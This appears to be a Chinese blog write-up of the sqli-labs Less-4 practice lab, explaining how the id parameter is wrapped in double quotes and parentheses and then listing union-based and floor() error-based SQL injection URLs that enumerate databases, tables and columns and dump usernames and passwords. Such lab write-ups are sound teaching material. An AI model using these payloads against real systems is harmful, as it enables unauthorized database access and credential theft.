zoukankan      html  css  js  c++  java
  • jQuery火箭图标返回顶部代码

    经测试,发现单引号不报错,而双引号却报错了

    通过查看源码,发现下图中红色的箭头,如果不知道是什么意思,我们可以复制出来看看是什么含义:

    <?php
    $id=1;
    $id='"' .$id. '"';
    echo $id;
    ?>
    得知是给参数加上两个双引号,,

    后面带入查询语句的时候 还加了()   ,所有我们的payload如下

    一、 union 查询

    查询字段:http://192.168.48.130/sqli-labs-master/Less-4/?id=1") order by 3--+

     查询当前数据库:http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") union select 1,database(),3--+




     查询所有数据库:http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

    查询security数据库下的所有表:http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),3--+

     查询users表下的所有字段:

    http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),3--+

     查询username,password 的具体值:

    http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") union select 1,(select group_concat(username,0x3a,password) from users),3--+

     

     二、floor报错注入

     查询数据库  Limit  来控制:

    http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

     爆表 Limit控制:

    http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

     爆字段:

    http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

     爆内容:

    http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") and (select 1 from (select count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

    
    
  • 相关阅读:
    react
    问题总结21-07-12至21-08-15
    排序
    问题总结21-06-28至21-07-11
    问题总结21-06-14至21-06-27
    问题总结21-05-29至21-06-13
    问题总结21-04-19至21-05-28
    问题总结21-03-29至21-04-18
    问题总结21-03-08至21-03-28
    问题总结21-03-01至21-03-07
  • 原文地址:https://www.cnblogs.com/kuaile1314/p/11345311.html
Copyright © 2011-2022 走看看